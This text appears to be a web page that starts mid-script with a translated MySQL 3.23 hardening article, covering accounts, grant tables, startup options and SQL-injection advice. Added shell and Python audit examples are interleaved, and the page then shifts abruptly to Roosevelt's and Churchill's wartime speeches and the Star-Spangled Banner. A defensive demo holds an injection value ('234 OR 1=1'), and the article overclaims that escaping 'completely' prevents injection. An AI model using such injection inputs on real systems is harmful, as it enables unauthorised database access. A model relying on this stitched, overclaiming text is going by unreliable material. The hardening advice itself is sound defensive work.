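            find "$dir" ! -user "$owner" -print | sed 's/^/OWNER /'
        } | sort
    )
    if [ -n "$report" ]; then
        printf '%s\n' "$report"
        return 1
    fi
    return 0
}

# Builds a constructed stand-in for /usr/local/mysql/var with two mistakes:
# the data directory itself is 775 and one table file is 644.
make_demo_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/var/mysql" "$root/var/test"
    : > "$root/var/mysql/user.MYD"
    : > "$root/var/mysql/user.frm"
    chmod 700 "$root/var/mysql" "$root/var/test"
    chmod 600 "$root/var/mysql/user.MYD"
    chmod 644 "$root/var/mysql/user.frm"
    chmod 775 "$root/var"
    echo "$root/var"
}

# Demo: audit, apply the article's chmod, audit again.
demo=$(make_demo_tree)
echo "before chmod -R go-rwx:"
audit_datadir "$demo" "$(id -u)" || true
chmod -R go-rwx "$demo"
echo "after chmod -R go-rwx:"
audit_datadir "$demo" "$(id -u)" && echo "clean"
rm -rf "${demo%/var}"
```

On a real server the call would be audit_datadir /usr/local/mysql/var mysql, run as a user allowed to traverse the directory.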


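  Starting a remote service as root has always been a security taboo, because if the service program has a flaw, a remote attacker is very likely to gain full control of the host. Starting with version 3.23.15, MySQL made a small change: after a default installation the service is to be started as the mysql user, and starting it as root is not allowed. If you really must start it as root, you have to add the --user=root option (./safe_mysqld --user=root &). Because MySQL has the SQL statements LOAD DATA INFILE and SELECT ... INTO OUTFILE, if the MySQL server is started by root, database users gain root's write permission. MySQL does impose some restrictions, though: LOAD DATA INFILE can read only world-readable files, and SELECT ... INTO OUTFILE cannot overwrite an existing file.

  Local log files must not be overlooked either, including shell logs and MySQL's own logs. For convenience, some users put the database password directly on the command line when logging in locally or backing up the database, for example: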

shell>/usr/local/mysql/bin/mysqldump -uroot -ptest test>test.sql
shell>/usr/local/mysql/bin/mysql -uroot -ptest


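  These commands are recorded by the shell in its history file; bash, for example, writes them to .bash_history in the user's home directory. If these files are read by someone who should not see them, the database password leaks. The SQL commands a user runs after logging in to the database are likewise recorded by MySQL in .mysql_history in the user's home directory. If a database user changes a database password with an SQL statement, it also leaks through .mysql_history. So when logging in from the shell or backing up, do not put the password directly after -p; enter the database password at the prompt instead.

  In addition, we should stop these two files from recording our operations, just in case.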

shell>rm .bash_history .mysql_history
shell>ln -s /dev/null .bash_history
shell>ln -s /dev/null .mysql_history


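  The two ln commands above link these two files to /dev/null, so our operations are no longer recorded in them.

3. External network security:

  After MySQL is installed, the user table on Unix platforms looks like this: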

mysql> use mysql;
Database changed
mysql> select Host,User,Password,Select_priv,Grant_priv from user;
+-----------+------+----------+-------------+------------+
| Host      | User | Password | Select_priv | Grant_priv |
+-----------+------+----------+-------------+------------+
| localhost | root |          | Y           | Y          |
| redhat    | root |          | Y           | Y          |
| localhost |      |          | N           | N          |
| redhat    |      |          | N           | N          |
+-----------+------+----------+-------------+------------+
4 rows in set (0.00 sec)


  On Windows platforms the user table looks like this:

mysql> use mysql;
Database changed
mysql> select Host,User,Password,Select_priv,Grant_priv from user;
+-----------+------+----------+-------------+------------+
| Host      | User | Password | Select_priv | Grant_priv |
+-----------+------+----------+-------------+------------+
| localhost | root |          | Y           | Y          |
| %         | root |          | Y           | Y          |
| localhost |      |          | Y           | Y          |
| %         |      |          | N           | N          |
+-----------+------+----------+-------------+------------+
4 rows in set (0.00 sec)

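  Let us look at the Unix user table first. Here redhat is just the hostname of my test machine, so in practice MySQL on Unix by default allows connections to the database only from the local machine. But the default root password is empty, so the first priority is to give root a password. There are three ways to set a password for a database user:

  1) At the shell prompt, change the root password with the mysqladmin command: shell>mysqladmin -uroot password test

  This changes the password of the MySQL root user to test. (test is only an example; the password we actually use must never be such an easily guessed weak password.)

  2) Change the password with set password: mysql> set password for root@localhost=password('test');

  The root password is now changed to test.

  3) Modify the root password in the user table directly: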

mysql> use mysql;
mysql> update user set password=password('test') where user='root';
mysql> flush privileges;

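  This also changes the MySQL root password to test. The last command, flush privileges, forces the in-memory grant tables to be reloaded; otherwise the cached password is still used, and an unauthorized user can still log in as root with an empty password until the MySQL server is restarted.

  We also see the anonymous user with an empty user field. Although it has hardly any privileges on Unix, for safety we should delete it: mysql> delete from user where user='';

  The user table of the Windows version of MySQL is very different: besides localhost, the Host field also contains %. Here % means that any host is allowed to connect to the MySQL server, which is very insecure and gives attackers an opening. We must delete the records whose Host field is %: mysql>delete from user where host='%';

  The default empty root password must also be changed; the three methods are the same as on Unix.

  Note that the anonymous user whose Host field is localhost has all privileges! That is, a local user who logs in to the MySQL server with an empty user name and an empty password gets the highest privileges! So the anonymous user must be deleted!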


mysql> delete from user where user='';


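  After modifying the user table, do not forget to run flush privileges to force a reload of the in-memory grant tables; only then do the changes take effect.


  A default installation of MySQL on Windows has too many insecure settings; after installing we must configure it further!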
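
The checks from this section applied mechanically, as an added example that is not part of the original article: the function reads tab-separated rows of Host, User, Password and privilege flags and reports empty passwords, anonymous accounts and Host values of %. The input shape assumes a batch-mode client call such as mysql -B -N -e "select Host,User,Password,Select_priv,Grant_priv from mysql.user"; the function names are hypothetical and the sample rows are constructed from the Windows default table shown above.

```shell
#!/bin/sh
# Added example (not from the original article). Function names are
# hypothetical; sample rows are constructed from the article's tables.

# audit_user_rows: reads tab-separated rows "Host User Password priv..." on
# stdin and prints one finding per line:
#   NOPASS   account has an empty Password field
#   ANYHOST  Host is %, so the row matches connections from any host
#   ANON     User is empty (anonymous account)
#   ANONPRIV anonymous account with at least one privilege flag set to Y
# Exit status: 0 = no findings, 1 = findings.
audit_user_rows() {
    awk -F '\t' '
        $0 == "" { next }
        {
            host = $1; user = $2; pass = $3
            who = (user == "" ? "(anonymous)" : user) "@" host
            if (pass == "") { print "NOPASS   " who; n++ }
            if (host == "%") { print "ANYHOST  " who; n++ }
            if (user == "") {
                print "ANON     " who; n++
                for (i = 4; i <= NF; i++)
                    if ($i == "Y") { print "ANONPRIV " who; n++; break }
            }
        }
        END { exit (n > 0) }
    '
}

# Constructed input: the four default rows of the Windows user table.
sample_windows_default() {
    printf 'localhost\troot\t\tY\tY\n'
    printf '%%\troot\t\tY\tY\n'
    printf 'localhost\t\t\tY\tY\n'
    printf '%%\t\t\tN\tN\n'
}

# Constructed input: the table after a root password has been set and the
# anonymous and % rows deleted. The hash is a placeholder, not a real one.
sample_hardened() {
    printf 'localhost\troot\t0123456789abcdef\tY\tY\n'
}

echo "Windows default table:"
sample_windows_default | audit_user_rows || true
echo "After hardening:"
sample_hardened | audit_user_rows && echo "no findings"
```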


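  MySQL's five grant tables, user, db, host, tables_priv and columns_priv, provide a very flexible security mechanism. Starting with MySQL 3.22.11, two statements, GRANT and REVOKE, were introduced to create and remove user privileges; they make it easy to restrict which users can connect to the server, from where, and what they can do once connected. As MySQL administrators we must understand what the grant tables mean and how to use GRANT and REVOKE to create users, grant and revoke privileges, and delete users.

  The grant mechanism in MySQL before 3.22.11 is incomplete and differs considerably from newer versions, so upgrading to the latest MySQL is recommended. (The examples in this book are based on MySQL 3.23.49.) Let us first look at the structure of the grant tables.

  1) Structure and contents of the MySQL grant tables: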

mysql> desc user;
+-----------------+-----------------+------+-----+---------+-------+
| Field           | Type            | Null | Key | Default | Extra |
+-----------------+-----------------+------+-----+---------+-------+
| Host            | char(60) binary |      | PRI |         |       |
| User            | char(16) binary |      | PRI |         |       |
| Password        | char(16) binary |      |     |         |       |
| Select_priv     | enum('N','Y')   |      |     | N       |       |
| Insert_priv     | enum('N','Y')   |      |     | N       |       |
| Update_priv     | enum('N','Y')   |      |     | N       |       |
| Delete_priv     | enum('N','Y')   |      |     | N       |       |
| Create_priv     | enum('N','Y')   |      |     | N       |       |
| Drop_priv       | enum('N','Y')   |      |     | N       |       |
| Reload_priv     | enum('N','Y')   |      |     | N       |       |
| Shutdown_priv   | enum('N','Y')   |      |     | N       |       |
| Process_priv    | enum('N','Y')   |      |     | N       |       |
| File_priv       | enum('N','Y')   |      |     | N       |       |
| Grant_priv      | enum('N','Y')   |      |     | N       |       |
| References_priv | enum('N','Y')   |      |     | N       |       |
| Index_priv      | enum('N','Y')   |      |     | N       |       |
| Alter_priv      | enum('N','Y')   |      |     | N       |       |
+-----------------+-----------------+------+-----+---------+-------+
17 rows in set (0.01 sec)

  The user table is the most important of the five grant tables. It lists the users that can connect to the server and their encrypted passwords, and it specifies which global (superuser) privileges they have. Any privilege enabled in the user table is a global privilege and applies to all databases. So we must not give any user permission to access the mysql.user table!

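Privilege descriptions:

+-----------+---------------+----------------------------------------------------------------+
| Privilege | Column name   | What it permits                                                |
+-----------+---------------+----------------------------------------------------------------+
| Select    | Select_priv   | Access to tables. select statements that do not touch tables,  |
|           |               | such as select 1+1, are not affected.                          |
+-----------+---------------+----------------------------------------------------------------+
| Insert    | Insert_priv   | Writing to tables with the insert statement.                   |
+-----------+---------------+----------------------------------------------------------------+
| Update    | Update_priv   | Modifying existing records with the update statement.          |
+-----------+---------------+----------------------------------------------------------------+
| Delete    | Delete_priv   | Deleting existing records with the delete statement.           |
+-----------+---------------+----------------------------------------------------------------+
| Create    | Create_priv   | Creating new databases and tables.                             |
+-----------+---------------+----------------------------------------------------------------+
| Drop      | Drop_priv     | Dropping existing databases and tables.                        |
+-----------+---------------+----------------------------------------------------------------+
| Index     | Index_priv    | Creating, modifying or dropping indexes.                       |
+-----------+---------------+----------------------------------------------------------------+
| Alter     | Alter_priv    | Modifying table structure with the alter statement.            |
+-----------+---------------+----------------------------------------------------------------+
| Grant     | Grant_priv    | Granting one's own privileges to other users, including grant. |
+-----------+---------------+----------------------------------------------------------------+
| Reload    | Reload_priv   | Reloading the grant tables, flushing the server, and similar   |
|           |               | commands.                                                      |
+-----------+---------------+----------------------------------------------------------------+
| Shutdown  | Shutdown_priv | Shutting down the MySQL server with mysqladmin shutdown.       |
|           |               | Dangerous; should not be granted casually.                     |
+-----------+---------------+----------------------------------------------------------------+
| Process   | Process_priv  | Viewing and killing the threads (processes) running in the     |
|           |               | MySQL server and the queries being executed, including         |
|           |               | queries that change passwords. Dangerous; should not be        |
|           |               | granted casually.                                              |
+-----------+---------------+----------------------------------------------------------------+
| File      | File_priv     | Reading world-readable files and writing files on the server.  |
|           |               | Dangerous; should not be granted casually.                     |
+-----------+---------------+----------------------------------------------------------------+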

mysql> desc db;
+-----------------+-----------------+------+-----+---------+-------+
| Field           | Type            | Null | Key | Default | Extra |
+-----------------+-----------------+------+-----+---------+-------+
| Host            | char(60) binary |      | PRI |         |       |
| Db              | char(64) binary |      | PRI |         |       |
| User            | char(16) binary |      | PRI |         |       |
| Select_priv     | enum('N','Y')   |      |     | N       |       |
| Insert_priv     | enum('N','Y')   |      |     | N       |       |
| Update_priv     | enum('N','Y')   |      |     | N       |       |
| Delete_priv     | enum('N','Y')   |      |     | N       |       |
| Create_priv     | enum('N','Y')   |      |     | N       |       |
| Drop_priv       | enum('N','Y')   |      |     | N       |       |
| Grant_priv      | enum('N','Y')   |      |     | N       |       |
| References_priv | enum('N','Y')   |      |     | N       |       |
| Index_priv      | enum('N','Y')   |      |     | N       |       |
| Alter_priv      | enum('N','Y')   |      |     | N       |       |
+-----------------+-----------------+------+-----+---------+-------+
13 rows in set (0.01 sec)

  The db table lists databases and the users that have privileges to access them. Privileges specified here apply to all tables in a database.

mysql> desc host;
+-----------------+-----------------+------+-----+---------+-------+
| Field           | Type            | Null | Key | Default | Extra |
+-----------------+-----------------+------+-----+---------+-------+
| Host            | char(60) binary |      | PRI |         |       |
| Db              | char(64) binary |      | PRI |         |       |
| Select_priv     | enum('N','Y')   |      |     | N       |       |
| Insert_priv     | enum('N','Y')   |      |     | N       |       |
| Update_priv     | enum('N','Y')   |      |     | N       |       |
| Delete_priv     | enum('N','Y')   |      |     | N       |       |
| Create_priv     | enum('N','Y')   |      |     | N       |       |
| Drop_priv       | enum('N','Y')   |      |     | N       |       |
| Grant_priv      | enum('N','Y')   |      |     | N       |       |
| References_priv | enum('N','Y')   |      |     | N       |       |
| Index_priv      | enum('N','Y')   |      |     | N       |       |
| Alter_priv      | enum('N','Y')   |      |     | N       |       |
+-----------------+-----------------+------+-----+---------+-------+

  The host table is used together with the db table to control, at a finer level, the access privileges of particular hosts to databases, which can be better than using db alone. This table is not affected by the GRANT and REVOKE statements, so you may find you do not use it at all.

mysql> desc tables_priv;
+-------------+------------------------------+------+-----+---------+-------+
| Field       | Type                         | Null | Key | Default | Extra |
+-------------+------------------------------+------+-----+---------+-------+
| Host        | char(60) binary              |      | PRI |         |       |
| Db          | char(64) binary              |      | PRI |         |       |
| User        | char(16) binary              |      | PRI |         |       |
| Table_name  | char(60) binary              |      | PRI |         |       |
| Grantor     | char(77)                     |      | MUL |         |       |
| Timestamp   | timestamp(14)                | YES  |     | NULL    |       |
| Table_priv  | set('Select','Insert',       |      |     |         |       |
|             | 'Update','Delete','Create',  |      |     |         |       |
|             | 'Drop','Grant','References', |      |     |         |       |
|             | 'Index','Alter')             |      |     |         |       |
| Column_priv | set('Select','Insert',       |      |     |         |       |
|             | 'Update','References')       |      |     |         |       |
+-------------+------------------------------+------+-----+---------+-------+
8 rows in set (0.01 sec)

  The tables_priv table specifies table-level privileges. A privilege specified here applies to all columns of a table.

mysql> desc columns_priv;
+-------------+------------------------+------+---+
| Field | Type | Null | Key | Default | Extra |
+-------------+------------------------+------+---+
| Host | char(60) binary | | PRI | | |
| Db | char(64) binary | | PRI | | |
| User | char(16) binary | | PRI | | |
| Table_name | char(64) binary | | PRI | | |
| Column_name | char(64) binary | | PRI | | |
| Timestamp | timestamp(14) | YES | | NULL | |
| Column_priv | set('Select','Insert', | | | | |
| | 'Update','References') | | | | |
+-------------+------------------------+------+---+
7 rows in set (0.00 sec)

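  The columns_priv table specifies column-level privileges. Privileges specified here apply to specific columns of a table.

  2) How the MySQL grant tables work:

  MySQL access control works in two steps:

  a) The server checks whether the user is allowed to connect.

  b) If the user is allowed to connect, the server then checks whether each request it issues has sufficient privileges. For example, a user who reads from a table in a database needs the select privilege on that database, and a user who drops a table in a database needs the drop privilege on that database.

  The user, db and host grant tables are used in both steps; the tables_priv and columns_priv tables are used only in the second step (request checking). Each grant table contains scope columns, which determine when a privilege applies, and privilege columns, which determine which privileges are granted.

  The scope columns specify when the privileges in a table apply. Each grant table entry contains User and Host columns that specify when the privilege applies to a connection by a given user from a given host. Other tables contain additional scope columns; for example, the db table contains a Db column indicating which database the privilege applies to. Similarly, the tables_priv and columns_priv tables contain scope fields that narrow the scope to a specific table in a database or a specific column of a table.

Below are some examples of Host and User combinations in the user table: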

+-----------------------------+--------+--------------+
| Host value | User value | Connections matched |
+-----------------------------+--------+--------------+
| 'x.y.z' | 'test' | user test can connect to the database only from x.y.z |
+-----------------------------+--------+--------------+
| 'x.y.z' | '' | any user can connect to the database from x.y.z |
+-----------------------------+--------+--------------+
| '%' | 'test' | user test can connect to the database from any host |
+-----------------------------+--------+--------------+
| '' | '' | any user can connect to the database from any host |
+-----------------------------+--------+--------------+
| '%.y.z' | 'test' | user test can connect to the database from any host in the y.z domain |
+-----------------------------+--------+--------------+
| 'x.y.%' | 'test' | user test can connect to the database from x.y.net, x.y.com, x.y.edu and similar hosts |
+-----------------------------+--------+--------------+
| '192.168.1.1' | 'test' | user test can connect to the database from the host with IP address 192.168.1.1 |
+-----------------------------+--------+--------------+
| '192.168.1.%' | 'test' | user test can connect to the database from any host in the class C subnet 192.168.1 |
+-----------------------------+--------+--------------+
| '192.168.1.0/255.255.255.0' | 'test' | same as above |
+-----------------------------+--------+--------------+

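  The SQL string wildcard % matches any sequence of characters, including zero characters; the wildcard _ matches exactly one character.

  The privilege columns indicate which privileges the user identified by the scope columns holds. The tables use the privilege names of the GRANT statement. For most privilege columns in the user, db and host tables, the name has an obvious relationship to the GRANT statement; for example, Select_priv corresponds to the SELECT privilege.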
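
  As an added example (not part of the original article and not MySQL's own code), the following Python code evaluates the Host/User combinations from the table above against a connecting client and lists the entries that admit any host or any user, which is what one would look for when auditing the user table. The function names and the sample clients are assumptions; the server's ordering of entries and its name-resolution rules are not modelled.

```python
import ipaddress
import re

# Host/User pairs copied from the table above (scope columns of the user table).
ENTRIES = [
    ("x.y.z", "test"),
    ("x.y.z", ""),
    ("%", "test"),
    ("", ""),
    ("%.y.z", "test"),
    ("x.y.%", "test"),
    ("192.168.1.1", "test"),
    ("192.168.1.%", "test"),
    ("192.168.1.0/255.255.255.0", "test"),
]


def like_to_regex(pattern):
    """Translate the SQL wildcards % and _ into an anchored regular expression."""
    parts = []
    for ch in pattern:
        if ch == "%":
            parts.append(".*")       # any run of characters, including none
        elif ch == "_":
            parts.append(".")        # exactly one character
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def host_matches(host_value, client_name, client_ip):
    """True if a Host value covers a client with this host name / IPv4 address."""
    if host_value == "":
        return True                  # blank Host: any host, as in the table
    if "/" in host_value:            # 'address/netmask' form
        base, mask = host_value.split("/", 1)
        try:
            base_i = int(ipaddress.IPv4Address(base))
            mask_i = int(ipaddress.IPv4Address(mask))
            ip_i = int(ipaddress.IPv4Address(client_ip))
        except ipaddress.AddressValueError:
            return False
        return (ip_i & mask_i) == base_i
    rx = like_to_regex(host_value)
    if rx.match(client_ip):
        return True
    return bool(client_name) and rx.match(client_name) is not None


def user_matches(user_value, client_user):
    """Blank User matches any user; otherwise the name must be identical."""
    return user_value == "" or user_value == client_user


def matching_entries(entries, client_user, client_name, client_ip):
    """All (Host, User) entries that would accept this connection."""
    return [
        (h, u) for (h, u) in entries
        if user_matches(u, client_user) and host_matches(h, client_name, client_ip)
    ]


def overly_broad(entries):
    """Audit helper: entries that accept any host or any user."""
    return [(h, u) for (h, u) in entries if h in ("", "%") or u == ""]


if __name__ == "__main__":
    # Constructed sample client: user test on 192.168.1.1.
    for entry in matching_entries(ENTRIES, "test", "db1.corp.example", "192.168.1.1"):
        print("accepts:", entry)
    for entry in overly_broad(ENTRIES):
        print("review :", entry)
```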

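  3) Examples of using the grant tables:

  grant is used to add users and create privileges; revoke is used to remove user privileges.

  Below are some examples of adding users and creating privileges with grant: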

mysql> grant all privileges on *.* to
test@localhost identified by 'test' with grant option;

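  This statement adds a local user test with all privileges (a superuser), with password test. The *.* in the ON clause means "all databases, all tables". with grant option means the user has the grant privilege.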

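mysql> grant select,insert,update,delete,create,drop
on test.* to test1@'192.168.1.0/255.255.255.0' identified by 'test';

  This statement adds a user test1 with password test; it can connect only from the class C subnet 192.168.1 and has select, insert, update, delete, create and drop privileges on the test database.

  When privileges are created with the grant statement there is no need to refresh the grant tables by hand, because grant reloads them automatically.

  Privileges can also be created for a user by modifying the grant tables directly: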

mysql> insert into user values("localhost","test",password("test"),"Y","Y","Y","Y","Y","Y",
"Y","Y","Y","Y","Y","Y","Y","Y");
mysql> flush privileges;

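  These two statements have the same effect as the first grant above: they also add a local superuser test. As we can see, grant is much more convenient and needs no flush privileges: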

mysql> insert into user (host,user,password) values
("192.168.1.0/255.255.255.0","test1",PASSWORD("test"));
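mysql> insert into db values("192.168.1.0/255.255.255.0",
"test","test1","Y","Y","Y","Y","Y","Y","N","N","N","N");
mysql> flush privileges;

  These three statements have the same effect as the second grant above: they add a user test1 with password test that can connect only from the class C subnet 192.168.1 and has select, insert, update, delete, create and drop privileges on the test database. To take privileges away from a user, use the revoke statement. The syntax of revoke is very similar to that of grant, except that to is replaced by from and there are no identified by or with grant option clauses. Here is an example of removing a user's privileges with revoke: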

mysql> revoke all on test.* from test1@'192.168.1.0/255.255.255.0';

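  This revoke withdraws the privileges created by the second grant above, but the test1 user itself is not removed; it must be deleted from the user table by hand: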

mysql> delete from user where user='test1';
mysql> flush privileges;


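  The test1 user is now completely removed.


  This is only basic use of the MySQL grant tables; for more detail see the manual supplied with MySQL.

3. Points to watch when programming:

  Whatever programming language is used to write a program that connects to a MySQL database, one rule applies: never trust data submitted by users!

  For numeric fields, use queries of the form SELECT * FROM table WHERE ID='234', not SELECT * FROM table WHERE ID=234. MySQL automatically converts the string to a number and strips non-numeric characters. If the user-submitted data has also been passed through mysql_escape_string, we can completely prevent SQL injection attacks.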

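Points to watch for in each programming language:

  1) All Web programs:

    a) Try entering single and double quotes in Web forms to test for possible errors, and find out their cause.

    b) Modify URL parameters to include %22 ('"'), %23 ('#') and %27 (''').

    c) For variables that hold numeric fields, our application must perform strict checks; otherwise it is very dangerous.

    d) Check whether user-submitted data exceeds the length of the field.

    e) Do not give the database user that your program connects as too many access privileges.

  2) PHP:

    a) Check that user-submitted data is passed through addslashes before it is used in a query; since PHP 4.0.3 there is also the function mysql_escape_string(), which is based on the MySQL C API.

  3) MySQL C API:

    a) Check that query strings use the mysql_escape_string() API call.

  4) MySQL++:

    a) Check that query strings are processed with escape and quote.

  5) Perl DBI:

    a) Check that query strings use the quote() method.

  6) Java JDBC:

    a) Check that query strings use the PreparedStatement object.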
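
  As an added example (not from the original article), the following Python code puts the unquoted numeric query that section 3 warns against next to a lookup that applies items 1c and 1d (strict numeric and length checks) and binds the value as a parameter, the same idea as the JDBC PreparedStatement in item 6. It uses Python's built-in sqlite3 module as a stand-in for MySQL so that it runs offline; the table, the function names and the 10-digit limit are assumptions.

```python
import sqlite3

MAX_ID_DIGITS = 10  # assumed width of the numeric field (item 1d)


def make_db():
    """Constructed sample data: three rows in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, owner TEXT)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?)",
        [(233, "alice"), (234, "bob"), (235, "carol")],
    )
    return conn


def lookup_unquoted(conn, user_value):
    """VULNERABLE: the submitted text becomes part of the SQL statement."""
    sql = "SELECT id, owner FROM items WHERE id=" + user_value
    return conn.execute(sql).fetchall()


def parse_id(user_value):
    """Strict check for a numeric field: ASCII digits only, bounded length."""
    if not isinstance(user_value, str):
        raise ValueError("id must be submitted as text")
    if not 1 <= len(user_value) <= MAX_ID_DIGITS:
        raise ValueError("id has an invalid length")
    # isdigit() alone also accepts non-ASCII digits, so require ASCII too.
    if not (user_value.isascii() and user_value.isdigit()):
        raise ValueError("id is not numeric")
    return int(user_value)


def lookup_bound(conn, user_value):
    """Hardened: validate first, then pass the value as a bound parameter."""
    item_id = parse_id(user_value)
    return conn.execute(
        "SELECT id, owner FROM items WHERE id=?", (item_id,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    hostile = "234 OR 1=1"  # constructed input with SQL appended to the number
    print("unquoted, normal :", lookup_unquoted(conn, "234"))
    print("unquoted, hostile:", lookup_unquoted(conn, hostile))
    print("bound, normal    :", lookup_bound(conn, "234"))
    try:
        lookup_bound(conn, hostile)
    except ValueError as exc:
        print("bound, hostile   : rejected:", exc)
```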

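4. Some tips

  1) If you have forgotten the MySQL root password, you can start the MySQL server with the --skip-grant-tables option to skip grant-table verification (./safe_mysqld --skip-grant-tables &). You can then log in to the MySQL server directly, change the root user's password, and restart MySQL to log in with the new password.

  2) Start the MySQL server with --skip-show-database so that ordinary database users cannot browse other databases.

  3) Start the MySQL server with the --chroot=path option so that the mysqld daemon runs in a chroot environment. The SQL statements LOAD DATA INFILE and SELECT ... INTO OUTFILE are then confined to reading and writing files under chroot_path. One thing to note: after starting, MySQL creates a mysql.sock file, by default in the /tmp directory. With chroot, MySQL creates mysql.sock in chroot_path/tmp; if chroot_path/tmp does not exist, or the user that starts MySQL has no write permission on it, mysql.sock cannot be created and MySQL fails to start. For example, if we start with --chroot=/usr/local/mysql/, it is best to create a /usr/local/mysql/tmp directory that the user starting MySQL can write to. We can also use --socket=path to specify the path of the mysql.sock file, but that path must be inside chroot_path.

  4) Start the MySQL server with the --log-slow-queries[=file] option so that mysqld writes SQL commands whose execution time exceeds long_query_time to file. If =file is not given, mysqld writes by default to hostname-slow.log in the data directory. If only a filename is given, without a path, mysqld also writes filename in the data directory. This log lets us find queries that take too long and optimize them as far as possible to reduce the load on the MySQL server.

  5) If we only need the MySQL service on the local machine, we can also add the --skip-networking startup option so that MySQL does not listen for any TCP/IP connections, which improves security. (Highly recommended)

  6) For more mysqld startup options, see section 4.16.4 mysqld Command-line Options of the MySQL manual.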

Franklin D. Roosevelt: For a Declaration of War

At 7:53 a.m. on Sunday, December 7, 1941, the first assault wave of Japanese fighter planes attacked the U.S. Naval base at Pearl Harbor, Hawaii, taking the Americans completely by surprise.
The first attack wave targeted airfields and battleships. The second wave targeted other ships and shipyard facilities. The air raid lasted until 9:45 a.m. Eight battleships were damaged, with five sunk. Three light cruisers, three destroyers and three smaller vessels were lost along with 188 aircraft. The Japanese lost 27 planes and five midget submarines which attempted to penetrate the inner harbor and launch torpedoes.
Three prime targets, the U.S. Pacific Fleet aircraft carriers Lexington, Enterprise and Saratoga, were not in the harbor and thus escaped damage.
The casualty list at Pearl Harbor included 2,335 servicemen and 68 civilians killed, and 1,178 wounded. Over a thousand crewmen aboard the USS Arizona battleship were killed after a 1,760 pound aerial bomb penetrated the forward magazine causing catastrophic explosions.
News of the "sneak attack" was broadcast to the American public via radio bulletins, with many popular Sunday afternoon entertainment programs being interrupted. The news sent a shockwave across the nation, resulting in a tremendous influx of young volunteers into the U.S. Armed Forces. The attack also united the nation behind President Franklin D. Roosevelt and effectively ended the American isolationist movement.
On Monday, December 8, President Roosevelt appeared before Congress and made this speech asking for a declaration of war against Japan, calling the previous day "...a date which will live in infamy..."
=================================

Mr. Vice President, Mr. Speaker, members of the Senate and the House of Representatives:
Yesterday, December 7, 1941 - a date which will live in infamy - the United States of America was suddenly and deliberately attacked by naval and air forces of the Empire of Japan.

The United States was at peace with that nation, and, at the solicitation of Japan, was still in conversation with its government and its Emperor looking toward the maintenance of peace in the Pacific.

Indeed, one hour after Japanese air squadrons had commenced bombing in the American island of Oahu, the Japanese Ambassador to the United States and his colleague delivered to our Secretary of State a formal reply to a recent American message. And, while this reply stated that it seemed useless to continue the existing diplomatic negotiations, it contained no threat or hint of war or of armed attack.

It will be recorded that the distance of Hawaii from Japan makes it obvious that the attack was deliberately planned many days or even weeks ago. During the intervening time the Japanese Government has deliberately sought to deceive the United States by false statements and expressions of hope for continued peace.

The attack yesterday on the Hawaiian Islands has caused severe damage to American naval and military forces. I regret to tell you that very many American lives have been lost. In addition, American ships have been reported torpedoed on the high seas between San Francisco and Honolulu.

Yesterday the Japanese Government also launched an attack against Malaya. Last night Japanese forces attacked Hong Kong. Last night Japanese forces attacked Guam. Last night Japanese forces attacked the Philippine Islands. Last night the Japanese attacked Wake Island. And this morning the Japanese attacked Midway Island.

Japan has therefore undertaken a surprise offensive extending throughout the Pacific area. The facts of yesterday and today speak for themselves. The people of the United States have already formed their opinions and well understand the implications to the very life and safety of our nation.

As Commander-in-Chief of the Army and Navy I have directed that all measures be taken for our defense, that always will our whole nation remember the character of the onslaught against us.

No matter how long it may take us to overcome this premeditated invasion, the American people, in their righteous might, will win through to absolute victory.

I believe that I interpret the will of the Congress and of the people when I assert that we will not only defend ourselves to the uttermost but will make it very certain that this form of treachery shall never again endanger us.

Hostilities exist. There is no blinking at the fact that our people, our territory and our interests are in grave danger.

With confidence in our armed forces, with the unbounding determination of our people, we will gain the inevitable triumph. So help us God.

I ask that the Congress declare that since the unprovoked and dastardly attack by Japan on Sunday, December 7, 1941, a state of war has existed between the United States and the Japanese Empire.

Franklin D. Roosevelt - December 8, 1941

====================================
Three days later, December 11, Japan's allies, Germany and Italy, both declared war on the United States. The U.S. Congress responded immediately by declaring war on them. Thus the European and Southeast Asian wars had become a global conflict with the Axis Powers (Japan, Germany, Italy and others) aligned against the Allied Powers (America, Britain, the Soviet Union and others).

We shall fight them on the beaches

Winston Churchill

"I have, myself, full confidence that if all do their duty, if nothing is neglected, and if the best arrangements are made, as they are being made, we shall prove ourselves once again able to defend our Island home, to ride out the storm of war, and to outlive the menace of tyranny, if necessary for years, if necessary alone.

At any rate, that is what we are going to try to do. That is the resolve of His Majesty's Government-every man of them. That is the will of Parliament and the nation.

The British Empire and the French Republic, linked together in their cause and in their need, will defend to the death their native soil, aiding each other like good comrades to the utmost of their strength.
Even though large tracts of Europe and many old and famous States have fallen or may fall into the grip of the Gestapo and all the odious apparatus of Nazi rule, we shall not flag or fail.

We shall go on to the end, we shall fight in France, we shall fight on the seas and oceans, we shall fight with growing confidence and growing strength in the air, we shall defend our Island, whatever the cost may be, we shall fight on the beaches, we shall fight on the landing grounds, we shall fight in the fields and in the streets, we shall fight in the hills; we shall never surrender, and even if, which I do not for a moment believe, this Island or a large part of it were subjugated and starving, then our Empire beyond the seas, armed and guarded by the British Fleet, would carry on the struggle, until, in God's good time, the New World, with all its power and might, steps forth to the rescue and the liberation of the old."

The Star Spangled Banner

By Francis Scott Key

Oh, say can you see by the dawn's early light
What so proudly we hailed at the twilight's last gleaming?
Whose broad stripes and bright stars thru the perilous fight,
O'er the ramparts we watched were so gallantly streaming?
And the rocket's red glare, the bombs bursting in air,
Gave proof through the night that our flag was still there.
Oh, say does that star-spangled banner yet wave
O'er the land of the free and the home of the brave?

On the shore, dimly seen through the mists of the deep,
Where the foe's haughty host in dread silence reposes,
What is that which the breeze, o'er the towering steep,
As it fitfully blows, half conceals, half discloses?
Now it catches the gleam of the morning's first beam,
In full glory reflected now shines in the stream:
'Tis the star-spangled banner! Oh long may it wave
O'er the land of the free and the home of the brave!


And where is that band who so vauntingly swore
That the havoc of war and the battle's confusion,
A home and a country should leave us no more!
Their blood has washed out their foul footsteps' pollution.
No refuge could save the hireling and slave
From the terror of flight, or the gloom of the grave:
And the star-spangled banner in triumph doth wave
O'er the land of the free and the home of the brave!


Oh! thus be it ever, when freemen shall stand
Between their loved home and the war's desolation!
Blest with victory and peace, may the heav'n rescued land
Praise the Power that hath made and preserved us a nation.
Then conquer we must, when our cause it is just,
And this be our motto: "In God is our trust."
And the star-spangled banner in triumph shall wave
O'er the land of the free and the home of the brave!

Monday, May 21, 2007

